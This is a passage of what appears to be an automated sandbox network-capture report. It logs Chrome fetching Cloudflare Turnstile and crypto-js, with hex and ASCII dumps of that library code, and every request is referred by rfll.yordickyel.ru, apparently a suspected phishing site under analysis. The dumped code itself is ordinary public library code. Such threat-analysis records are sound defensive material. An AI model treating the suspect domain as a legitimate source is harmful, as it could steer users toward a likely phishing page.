                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.449754104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:28 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://rfll.yordickyel.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:28 UTC386INHTTP/1.1 302 Found
                                                                  Date: Mon, 13 Jan 2025 21:52:28 GMT
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  access-control-allow-origin: *
                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                  cross-origin-resource-policy: cross-origin
                                                                  location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d100aa441ba-EWR
                                                                  alt-svc: h3=":443"; ma=86400


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.449755104.17.25.144435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:28 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://rfll.yordickyel.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:28 UTC964INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:28 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"61182885-40eb"
                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: HIT
                                                                  Age: 462959
                                                                  Expires: Sat, 03 Jan 2026 21:52:28 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S83xYzWoJjt1%2B22A7lCltCX%2FWD8pc%2FZTjN2dHPF%2Bm29IYg4yFQ6kpgAUZCvfz6MlB3piQSPm1vonCVSaoKZMxO2e7%2F2FEjZZC0NEzVfDQxFfDy9EhSpjO7Z7HwSbs%2FmIVqaxSuYs"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d100d668cc5-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:28 UTC405INData Raw: 33 39 37 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                  Data Ascii: 3977!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                  Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                                  Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                                  Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                                  Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                                  Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                                  Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                                  Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                                  Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                                  Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.449757104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:28 UTC649OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://rfll.yordickyel.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:28 UTC471INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:28 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 47521
                                                                  Connection: close
                                                                  accept-ranges: bytes
                                                                  last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                  access-control-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d13dbbcc33f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:28 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                  2025-01-13 21:52:28 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
